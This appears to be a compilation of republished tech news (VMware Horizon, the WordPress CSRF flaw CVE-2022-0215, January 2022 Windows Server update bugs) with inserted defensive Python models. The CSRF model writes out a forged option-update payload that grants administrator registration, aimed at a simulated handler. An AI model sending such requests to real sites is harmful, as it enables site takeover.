The VMware Horizon Control Plane Services are designed for the connectivity needs of remote workers. Organizations that consume virtual desktops and apps from providers that only support cloud deployments can benefit from the Control Plane Services, as can organizations whose existing VDI implementation is tied to a single environment. The Horizon Control Plane allows all hybrid and multi-cloud deployments and configurations to be managed from one place.

VMware Horizon hybrid architecture with the Horizon Control Plane

Beyond central management, the Control Plane provides:

  • Universal brokering
  • Image management
  • Application management
  • Monitoring
  • Lifecycle management

The Horizon Control Plane Services

Just-in-time desktops and apps

VMware Horizon allows organizations to provision “just-in-time” desktops and applications using what VMware calls Instant Clone Technology. Instant clones are created from a running parent VM in seconds; on average, about one clone per second can be produced.

Instant Clone Technology is a major evolution of what VMware Composer linked clones could do previously. It dramatically reduces the number of steps needed to provision a clone compared with VMware Composer. Note the comparison of the two processes below:

Comparing VMware Horizon Composer with Instant Clone Technology

The VMware Instant Clone Technology was born from a project called “vmFork” that uses rapid in-memory cloning of a running parent virtual machine and copy-on-write to deploy the virtual machines to production rapidly.

  • Copy-on-write – Copy-on-write is an optimization that lets several tasks share a single copy of data until one of them modifies it; only at that first write is a separate private copy made for the writer, so its changes never become visible to the other tasks. With Instant Clone Technology, the parent VM is quiesced and then forked. The child shares the parent’s memory pages and disk on a copy-on-write basis, so almost nothing is copied at fork time, and each resulting clone receives a unique MAC address, UUID, and other unique identity information.

Using the Instant Clone Technology with VDI provisioning is perfect for the just-in-time desktop and applications use case. New workstations can quickly be provisioned, just in time for the user to log into the environment. Then, using VMware App Volumes to attach AppStacks to the just-in-time desktops dynamically, you can have fully functional workstations with dynamically assigned applications in a matter of seconds, fully customized for each user.
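As an added illustration, not VMware’s own code, the copy-on-write forking described above reduced to a small Python model: a parent VM’s memory pages are shared by reference with its forked children and carry a reference count, nothing is copied at fork time, a page is duplicated privately only on the first write by one of its sharers, and every clone receives its own UUID and MAC address. Page contents, page numbers and VM names are constructed for the example.

```python
import uuid


class Page:
    """One guest memory page. refs counts how many VMs' page tables point at it."""
    def __init__(self, data):
        self.data = bytes(data)
        self.refs = 1


def random_mac():
    # Locally administered, unicast: set bit 1 and clear bit 0 of the first octet.
    octets = bytearray(uuid.uuid4().bytes[:6])
    octets[0] = (octets[0] | 0x02) & 0xFE
    return ":".join(f"{o:02x}" for o in octets)


class VirtualMachine:
    def __init__(self, name, page_table):
        self.name = name
        self.uuid = str(uuid.uuid4())     # every VM, parent or clone, gets its own identity
        self.mac = random_mac()
        self.pages = page_table           # page number -> Page (possibly shared)
        self.quiesced = False
        self.private_copies = 0           # pages this VM has had to duplicate so far

    @classmethod
    def from_image(cls, name, image):
        return cls(name, {n: Page(d) for n, d in image.items()})

    def quiesce(self):
        """Freeze the parent so its memory is a consistent fork point."""
        self.quiesced = True

    def fork(self, child_name):
        """vmFork-style instant clone: the child gets its own page table whose entries
        point at the parent's pages; no page contents are copied."""
        if not self.quiesced:
            raise RuntimeError("quiesce the parent before forking")
        for page in self.pages.values():
            page.refs += 1
        return VirtualMachine(child_name, dict(self.pages))

    def read(self, page_no):
        return self.pages[page_no].data

    def write(self, page_no, data):
        """Copy-on-write: a page still shared with someone else is duplicated for this
        VM before being modified, so the other sharers never see the change."""
        page = self.pages[page_no]
        if page.refs > 1:
            page.refs -= 1
            page = Page(page.data)
            self.pages[page_no] = page
            self.private_copies += 1
        page.data = bytes(data)


def demo():
    """Fork two clones from one quiesced parent, then customize one of them."""
    image = {0: b"bootcode", 1: b"kernel", 2: b"hostname=parent"}   # constructed image
    parent = VirtualMachine.from_image("parent", image)
    parent.quiesce()
    clone_a, clone_b = parent.fork("clone-a"), parent.fork("clone-b")
    shared_at_fork = clone_a.pages[2] is parent.pages[2]
    clone_a.write(2, b"hostname=clone-a")     # first write: page 2 is duplicated for clone_a only
    return {
        "shared_at_fork": shared_at_fork,
        "parent_unchanged": parent.read(2) == b"hostname=parent",
        "clone_a_sees_own_write": clone_a.read(2) == b"hostname=clone-a",
        "clone_b_still_shares": clone_b.pages[2] is parent.pages[2],
        "page2_sharers": parent.pages[2].refs,          # parent and clone_b
        "clone_a_private_copies": clone_a.private_copies,
        "distinct_uuids": len({parent.uuid, clone_a.uuid, clone_b.uuid}),
        "distinct_macs": len({parent.mac, clone_a.mac, clone_b.mac}),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The reference count is what makes the deferred copy safe: a write by any sharer, parent included, is what triggers the private copy, and a page whose count has dropped back to one is modified in place.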

Should you be using VMware Horizon?

VMware Horizon is a powerful remote connectivity solution that allows businesses today to solve the challenges of remote workers and connectivity needs. In addition, it enables businesses to scale their deployments with modern architectures, including hybrid cloud deployments and multi-cloud architectures.

With the new VMware Horizon Control Plane services, organizations can manage multiple VMware Horizon deployments across sites, clouds, and different infrastructures from the cloud. In addition, it opens up the possibility for organizations to use heterogeneous implementations of virtual desktops that may exist across on-premises and public cloud environments and aggregate these services for end-users.

VMware provides a rich set of additional solutions and services that seamlessly integrate with VMware Horizon and extend the solution’s capabilities, scalability, security, and management. These include VMware vSAN, VMware NSX-T Data Center, VMware Workspace ONE, Workspace ONE UEM, and VMware Anywhere Workspace.

For end-user clients, connecting to Workspace ONE or native VMware Horizon resources is as simple as browsing the solution’s service URLs. While the VMware Horizon Client provides the most robust connectivity experience for end-user clients, users can also use the HTML client to connect to virtual machines, physical desktops, and applications using a simple web browser.

The Instant Clone Technology provided by VMware Horizon allows just-in-time desktops and applications to be provisioned in seconds, a feat that is amazing to see and provides businesses with the capability to have exponentially more scale in providing virtual desktops to end-users. In addition, the dynamic capabilities offered by VMware Horizon allow companies to elastically scale up and scale down virtual desktops, even with on-premises infrastructure.

Source :
https://www.altaro.com/vmware/vmware-horizon/

High-Severity Vulnerability in 3 WordPress Plugins Affected 84,000 Websites

Researchers have disclosed a security shortcoming affecting three different WordPress plugins that impact over 84,000 websites and could be abused by a malicious actor to take over vulnerable sites.

“This flaw made it possible for an attacker to update arbitrary site options on a vulnerable site, provided they could trick a site’s administrator into performing an action, such as clicking on a link,” WordPress security company Wordfence said in a report published last week.

Tracked as CVE-2022-0215, the cross-site request forgery (CSRF) flaw is rated 8.8 on the CVSS scale and impacts three plugins maintained by Xootix —

Cross-site request forgery, also known as one-click attack or session riding, occurs when an authenticated end-user is tricked by an attacker into submitting a specially crafted web request. “If the victim is an administrative account, CSRF can compromise the entire web application,” OWASP notes in its documentation.


Specifically, the vulnerability has its origin in a lack of validation when processing AJAX requests, effectively enabling an attacker to update the “users_can_register” (i.e., anyone can register) option on a site to true and set the “default_role” setting (i.e., the default role of users who register at the blog) to administrator, granting complete control.
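The request pattern described above, as an added Python model that is not the plugins’ PHP code: a vulnerable AJAX handler that trusts the login cookie alone and writes any posted key into the site options, beside a hardened handler that requires a per-user, time-limited nonce (modelled on WordPress’s wp_create_nonce / check_ajax_referer design, an HMAC over tick, action, user ID and session token), a manage_options capability check, and an allow-list of plugin-owned option keys. The action name example_plugin_save_settings, the option example_plugin_popup_enabled, the secret, the user IDs and the session tokens are all constructed for the example.

```python
import hashlib
import hmac

# Constructed stand-ins: the nonce secret (NONCE_KEY/NONCE_SALT in wp-config.php on a
# real site), a two-user role table, and hypothetical plugin action/option names.
NONCE_SECRET = b"constructed-example-secret-not-for-reuse"
NONCE_LIFETIME = 24 * 60 * 60                   # WordPress nonces live a day, in two 12-hour ticks
USER_CAPS = {1: {"manage_options"}, 2: set()}   # user 1: administrator, user 2: subscriber
ACTION = "example_plugin_save_settings"         # hypothetical AJAX action name
# Only plugin-owned options may be written, each with a validator. Core options such
# as users_can_register and default_role are deliberately absent from this list.
ALLOWED_OPTIONS = {"example_plugin_popup_enabled": lambda v: v in ("0", "1")}


def fresh_site_options():
    """Default WordPress state: registration closed, new users become subscribers."""
    return {"users_can_register": "0", "default_role": "subscriber"}


def _nonce_for_tick(tick, action, user_id, session_token):
    msg = f"{tick}|{action}|{user_id}|{session_token}".encode()
    return hmac.new(NONCE_SECRET, msg, hashlib.sha256).hexdigest()[:16]


def create_nonce(action, user_id, session_token, now):
    """Embedded in the page the server renders for this user; a page on another origin
    cannot read it, which is what makes it a CSRF token."""
    return _nonce_for_tick(now // (NONCE_LIFETIME // 2), action, user_id, session_token)


def verify_nonce(nonce, action, user_id, session_token, now):
    tick = now // (NONCE_LIFETIME // 2)
    return any(hmac.compare_digest(_nonce_for_tick(t, action, user_id, session_token), nonce)
               for t in (tick, tick - 1))       # current and previous tick, as WordPress does


def make_request(user_id, session_token, params, now):
    # user_id/session_token are what the login cookie establishes. The browser attaches
    # that cookie to every request to the site, including one an attacker's page triggers.
    return {"user_id": user_id, "session_token": session_token, "params": dict(params), "now": now}


def vulnerable_ajax_update_options(request, options):
    """The flawed pattern: being logged in is the only check, and every posted key is
    written straight into the options table."""
    if request["user_id"] is None:
        return "not logged in"
    for key, value in request["params"].items():
        options[key] = value
    return "updated"


def hardened_ajax_update_options(request, options):
    """Nonce, capability check, and an allow-list of validated keys. In WordPress the
    first two are check_ajax_referer() and current_user_can('manage_options')."""
    params = request["params"]
    if request["user_id"] is None:
        return "not logged in"
    if not verify_nonce(params.get("_ajax_nonce", ""), ACTION, request["user_id"],
                        request["session_token"], request["now"]):
        return "nonce check failed"
    if "manage_options" not in USER_CAPS.get(request["user_id"], set()):
        return "insufficient capability"
    updates = {k: v for k, v in params.items() if k != "_ajax_nonce"}
    for key, value in updates.items():
        if key not in ALLOWED_OPTIONS or not ALLOWED_OPTIONS[key](value):
            return f"rejected option {key}"
    options.update(updates)
    return "updated"


def run_scenarios(now=1_700_000_000):            # fixed clock keeps the run deterministic
    admin, admin_sess = 1, "cookie-session-admin"
    subscriber, sub_sess = 2, "cookie-session-subscriber"
    forged = {"users_can_register": "1", "default_role": "administrator"}   # attacker's payload
    legit = {"example_plugin_popup_enabled": "1"}
    results = {}

    def run(label, handler, user, sess, params):
        options = fresh_site_options()
        results[label] = (handler(make_request(user, sess, params, now), options), options)

    # 1. CSRF: the admin's browser submits the attacker's form; the cookie rides along, no nonce.
    run("vulnerable_forged", vulnerable_ajax_update_options, admin, admin_sess, forged)
    # 2. The same forged request against the hardened handler.
    run("hardened_forged", hardened_ajax_update_options, admin, admin_sess, forged)
    # 3. A legitimate save from the settings page rendered for the admin.
    run("hardened_legit", hardened_ajax_update_options, admin, admin_sess,
        {**legit, "_ajax_nonce": create_nonce(ACTION, admin, admin_sess, now)})
    # 4. Valid nonce, but core options are not on the allow-list even for an admin.
    run("hardened_core_option", hardened_ajax_update_options, admin, admin_sess,
        {**forged, "_ajax_nonce": create_nonce(ACTION, admin, admin_sess, now)})
    # 5. A subscriber with a valid nonce for their own session still lacks the capability.
    run("hardened_subscriber", hardened_ajax_update_options, subscriber, sub_sess,
        {**legit, "_ajax_nonce": create_nonce(ACTION, subscriber, sub_sess, now)})
    # 6. A nonce captured a day earlier has expired (two ticks old).
    run("hardened_stale", hardened_ajax_update_options, admin, admin_sess,
        {**legit, "_ajax_nonce": create_nonce(ACTION, admin, admin_sess, now - NONCE_LIFETIME)})
    return results


if __name__ == "__main__":
    for label, (outcome, options) in run_scenarios().items():
        print(f"{label}: {outcome} -> {options}")
```

The nonce alone is not the whole fix: it stops the cross-site request, but the capability check is what stops a low-privileged logged-in user who does hold a valid nonce, and the allow-list is what stops a handler from ever being a generic “write any option” primitive.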

Login/Signup Popup is installed on over 20,000 sites, while Side Cart Woocommerce and Waitlist Woocommerce have been installed on more than 4,000 and 60,000 sites, respectively.

Following responsible disclosure by Wordfence researchers in November 2021, the issue has been addressed in Login/Signup Popup version 2.3, Side Cart Woocommerce version 2.1, and Waitlist Woocommerce version 2.5.2.

The findings come a little over a month after attackers exploited weaknesses in four plugins and 15 Epsilon Framework themes to target 1.6 million WordPress sites as part of a large-scale attack campaign originating from 16,000 IP addresses.

“Though this Cross-Site Request Forgery (CSRF) vulnerability is less likely to be exploited due to the fact that it requires administrator interaction, it can have a significant impact to a successfully exploited site and, as such, it serves as an incredibly important reminder to remain aware when clicking on links or attachments and to ensure that you are regularly keeping your plugins and themes up to date,” Wordfence’s Chloe Chamberland said.

Source :
https://thehackernews.com/2022/01/high-severity-vulnerability-in-3.html

Microsoft releases emergency fixes for Windows Server, VPN bugs

Microsoft has released emergency out-of-band (OOB) updates to address multiple issues caused by Windows Updates issued during the January 2022 Patch Tuesday.

“Microsoft is releasing Out-of-band (OOB) updates today, January 18, 2022, for some versions of Windows,” the company said.

“This update addresses issues related to VPN connectivity, Windows Server Domain Controllers restarting, Virtual Machines start failures, and ReFS-formatted removable media failing to mount.”

All OOB updates released today are available for download on the Microsoft Update Catalog, and some of them can also be installed directly through Windows Update as optional updates.

You will have to manually check for updates if you want to install the emergency fixes through Windows Update because they are optional updates and will not install automatically.

The following updates can only be downloaded and installed via the Microsoft Update Catalog:

Updates for these Windows versions are also available through Windows Update as an optional update:

  • Windows 11, version 21H2 (original release): KB5010795
  • Windows Server 2022: KB5010796
  • Windows 10, version 21H2: KB5010793
  • Windows 10, version 21H1: KB5010793
  • Windows 10, version 20H2, Windows Server, version 20H2: KB5010793
  • Windows 10, version 20H1, Windows Server, version 20H1: KB5010793
  • Windows 10, version 1909, Windows Server, version 1909: KB5010792
  • Windows Server 2019: KB5010791 (Released on 1/18/22)
  • Windows 10, version 1607, Windows Server 2016: KB5010790
  • Windows 10, version 1507: KB5010789
  • Windows 7 SP1: KB5010798
  • Windows Server 2008 SP2: KB5010799

January Windows updates issues and fixes

As BleepingComputer reported after this month’s Patch Tuesday, the latest Windows Server updates were causing a series of severe issues for administrators.

According to admin reports, Windows domain controllers were being plagued by spontaneous reboots, Hyper-V was no longer starting on Windows servers, and Windows Resilient File System (ReFS) volumes were no longer accessible after deploying the January 2022 updates.

Windows 10 users and administrators also reported problems with L2TP VPN connections after installing the recent Windows 10 and Windows 11 cumulative updates and seeing “Can’t connect to VPN.” errors.

Those who cannot immediately install today’s out-of-band updates can remove the KB5009624, KB5009557, KB5009555, KB5009566, and KB5009543 updates causing these issues from an Elevated Command Prompt with the following commands:

Windows Server 2012 R2: wusa /uninstall /kb:5009624 
Windows Server 2019: wusa /uninstall /kb:5009557 
Windows Server 2022: wusa /uninstall /kb:5009555
Windows 10: wusa /uninstall /kb:5009543
Windows 11: wusa /uninstall /kb:5009566

However, since Microsoft also bundles all the security updates with these Windows cumulative updates, removing them will also remove all fixes for vulnerabilities patched during the January 2022 Patch Tuesday. 

Windows admins and users need to consider the risks of unpatched vulnerabilities impacting their systems versus the disruption caused by the issues stemming from this month’s Windows updates.

Source :
https://www.bleepingcomputer.com/news/microsoft/microsoft-releases-emergency-fixes-for-windows-server-vpn-bugs/

New Windows Server updates cause DC boot loops, break Hyper-V

Update 1/17/22: Microsoft has released OOB updates to fix the Windows Server bugs.

The latest Windows Server updates are causing severe issues for administrators, with domain controllers rebooting spontaneously, Hyper-V not starting, and ReFS volumes inaccessible until the updates are rolled back.

Yesterday, Microsoft released the Windows Server 2012 R2 KB5009624 update, the Windows Server 2019 KB5009557 update, and the Windows Server 2022 KB5009555 update as part of the January 2022 Patch Tuesday.

After installing these updates, administrators have been battling multiple issues that are only resolved after removing the updates.

Windows domain controller boot loops

The most serious issue introduced by these updates is that Windows domain controllers enter a boot loop, with servers getting into an endless cycle of Windows starting and then rebooting after a few minutes.

As first reported by BornCity, this issue affects all supported Windows Server versions.

“Looks KB5009557 (2019) and KB5009555 (2022) are causing something to fail on domain controllers, which then keep rebooting every few minutes,” a user posted to Reddit.

A Windows Server administrator told BleepingComputer that they see the LSASS.exe process use all of the CPU on a server and then ultimately terminate.

As LSASS is a critical process required for Windows to operate correctly, the operating system will automatically restart when the process is terminated.

The following error will be logged to the event viewer when restarting due to a crashed LSASS process, as another user on Reddit shared.

“The process wininit.exe has initiated the restart of computer [computer_name] on behalf of user for the following reason: No title for this reason could be found Reason Code: 0x50006 Shutdown Type: restart Comment: The system process ‘C:\WINDOWS\system32\lsass.exe’ terminated unexpectedly with status code -1073741819. The system will now shut down and restart.”

Hyper-V no longer starts

In addition to the boot loops, BleepingComputer has been told by Windows administrators that after installing the patches, Hyper-V no longer starts on the server.

This bug primarily affects Windows Server 2012 R2, but other unverified reports say it affects newer versions of Windows Server as well.

As Hyper-V is not started, when attempting to launch a virtual machine, users will receive an error stating the following:

“Virtual machine xxx could not be started because the hypervisor is not running.”

Microsoft released security updates to fix four different Hyper-V vulnerabilities yesterday (CVE-2022-21901, CVE-2022-21900, CVE-2022-21905, and CVE-2022-21847), which are likely causing this issue.

ReFS file systems are no longer accessible

Finally, numerous admins are reporting that Windows Resilient File System (ReFS) volumes are no longer accessible or are seen as RAW (unformatted) after installing the updates.

The Resilient File System (ReFS) is a Microsoft proprietary file system that has been designed for high availability, data recovery, and high performance for very large storage volumes.

“Installed these updates tonight, in a two server Exchange 2016 CU22 DAG, running on Server 2012 R2. After a really long reboot, the server came back up with all the ReFS volumes as RAW,” explained a Microsoft Exchange administrator on Reddit.

“NTFS volumes attached were fine. I realize this is not exclusively an exchange question but it is impacting my ability to bring services for Exchange back online.”

Uninstalling the Windows Server updates made the ReFS volumes accessible again.

Yesterday, Microsoft fixed eight remote code execution vulnerabilities in ReFS, with one or more likely behind the inaccessible ReFS volumes.

These vulnerabilities are tracked as CVE-2022-21961, CVE-2022-21959, CVE-2022-21958, CVE-2022-21960, CVE-2022-21963, CVE-2022-21892, CVE-2022-21962, CVE-2022-21928.

How to fix?

Unfortunately, the only way to fix these issues is to uninstall the corresponding cumulative update for your Windows version.

Admins can do this by using one of the following commands:

Windows Server 2012 R2: wusa /uninstall /kb:5009624
Windows Server 2019: wusa /uninstall /kb:5009557
Windows Server 2022: wusa /uninstall /kb:5009555

As Microsoft bundles all security fixes into the single update, removing the cumulative update may fix the bugs, but will also remove all fixes for recently patched vulnerabilities.

Therefore, uninstalling these updates should only be done if absolutely necessary.
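An added Python example, not from either article, that turns the two symptoms above into checks an administrator can run over exported data: it scans System-log text for the User32 event 1074 restart message quoting the lsass.exe crash (status -1073741819, which is NTSTATUS 0xC0000005, an access violation), flags a host as boot-looping when it restarts for that reason repeatedly within a short window, and compares a host’s installed hotfix list (as Get-HotFix would report it) against the January 2022 cumulative updates and the out-of-band fixes the articles list, producing the matching wusa rollback command only when a CU is present without its fix. The event lines and hotfix lists are constructed; the Server 2012 R2 out-of-band update is not named on this page and is left unspecified.

```python
import re
from datetime import datetime, timedelta

# January 2022 cumulative update and matching out-of-band fix per Windows version,
# as listed in the articles above. The 2012 R2 OOB update is not named on this page.
JAN_2022_CU = {
    "Windows Server 2012 R2": ("KB5009624", None),
    "Windows Server 2019": ("KB5009557", "KB5010791"),
    "Windows Server 2022": ("KB5009555", "KB5010796"),
    "Windows 10": ("KB5009543", "KB5010793"),
    "Windows 11": ("KB5009566", "KB5010795"),
}

# Matches the 1074 message text: the computer name, then the quoted lsass.exe crash.
LSASS_CRASH = re.compile(r"restart of computer (\S+) .*?'[^']*\\lsass\.exe' terminated "
                         r"unexpectedly with status code (-?\d+)", re.IGNORECASE)


def ntstatus(signed32):
    """The event shows the exit status as a signed 32-bit int; map it back to NTSTATUS."""
    return signed32 & 0xFFFFFFFF            # -1073741819 -> 0xC0000005 STATUS_ACCESS_VIOLATION


def lsass_crash_restarts(event_lines):
    """Return (timestamp, host, ntstatus) for every 1074 restart caused by an lsass.exe crash.
    Expected line shape: 'YYYY-MM-DD HH:MM:SS host source eventid message'."""
    hits = []
    for line in event_lines:
        fields = line.split(" ", 5)
        if len(fields) < 6 or fields[4] != "1074":
            continue
        m = LSASS_CRASH.search(fields[5])
        if m:
            ts = datetime.strptime(f"{fields[0]} {fields[1]}", "%Y-%m-%d %H:%M:%S")
            hits.append((ts, m.group(1), ntstatus(int(m.group(2)))))
    return hits


def boot_loop_hosts(hits, window_minutes=15, min_restarts=2):
    """A host that restarts because of lsass.exe at least min_restarts times within
    window_minutes is treated as boot-looping."""
    by_host = {}
    for ts, host, _ in hits:
        by_host.setdefault(host, []).append(ts)
    looping = set()
    for host, times in by_host.items():
        times.sort()
        for i in range(len(times) - min_restarts + 1):
            if times[i + min_restarts - 1] - times[i] <= timedelta(minutes=window_minutes):
                looping.add(host)
                break
    return looping


def patch_status(windows_version, installed_kbs):
    """Compare a host's hotfix list with the known-bad CU and its OOB fix."""
    cu, oob = JAN_2022_CU[windows_version]
    installed = {kb.upper() for kb in installed_kbs}
    status = {"january_cu": cu, "cu_installed": cu in installed,
              "oob_fix": oob, "oob_installed": bool(oob and oob in installed),
              "rollback_command": None}
    if status["cu_installed"] and not status["oob_installed"]:
        status["rollback_command"] = f"wusa /uninstall /kb:{cu[2:]}"   # wusa takes the bare number
    return status


def _lsass_event(ts, host):
    """Constructed System-log line in the shape of the 1074 message quoted above."""
    return (f"{ts} {host} User32 1074 The process wininit.exe has initiated the restart of "
            f"computer {host} on behalf of user  for the following reason: No title for this "
            "reason could be found Reason Code: 0x50006 Shutdown Type: restart Comment: The "
            "system process 'C:\\WINDOWS\\system32\\lsass.exe' terminated unexpectedly with "
            "status code -1073741819. The system will now shut down and restart.")


SAMPLE_EVENTS = [   # constructed
    _lsass_event("2022-01-12 03:02:11", "DC01"),
    "2022-01-12 03:05:40 DC01 Service Control Manager 7036 The Netlogon service entered the running state.",
    _lsass_event("2022-01-12 03:08:27", "DC01"),
    "2022-01-12 03:10:02 FS01 User32 1074 The process C:\\Windows\\system32\\winlogon.exe (FS01) "
    "has initiated the restart of computer FS01 on behalf of user CORP\\admin for the following "
    "reason: Other (Planned) Reason Code: 0x85000000 Shutdown Type: restart Comment: ",
    _lsass_event("2022-01-12 03:14:55", "DC01"),
    _lsass_event("2022-01-12 09:30:00", "DC02"),   # one crash on DC02: not a loop
]
SAMPLE_HOTFIXES = {   # constructed, as Get-HotFix would list them
    "DC01": ("Windows Server 2019", ["KB5008882", "KB5009557"]),
    "DC02": ("Windows Server 2022", ["KB5009555", "KB5010796"]),
}

if __name__ == "__main__":
    hits = lsass_crash_restarts(SAMPLE_EVENTS)
    print("boot-looping hosts:", sorted(boot_loop_hosts(hits)))
    for host, (version, kbs) in SAMPLE_HOTFIXES.items():
        print(host, patch_status(version, kbs))
```

The planned winlogon restart on FS01 shares the event ID but not the lsass.exe comment, which is why the match is on the message text rather than on 1074 alone; the rollback command is only emitted when the bad CU is present and its fix is not, so a host that already has the OOB update is never told to remove its security fixes.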

Not to be outdone by Windows Server, Windows 10 and Windows 11’s updates are also breaking L2TP VPN connections.

On January 17th, Microsoft released out-of-band updates to fix the following issues:

  • Windows L2TP VPN connection issues
  • Domain controller reboots
  • Hyper-V not starting
  • ReFS volumes becoming inaccessible

More information about these updates can be found in our dedicated “Microsoft releases emergency fixes for Windows Server, VPN bugs” article.

Update 1/17/22: Added information about the OOB updates released to fix these issues.

Source :
https://www.bleepingcomputer.com/news/microsoft/new-windows-server-updates-cause-dc-boot-loops-break-hyper-v/
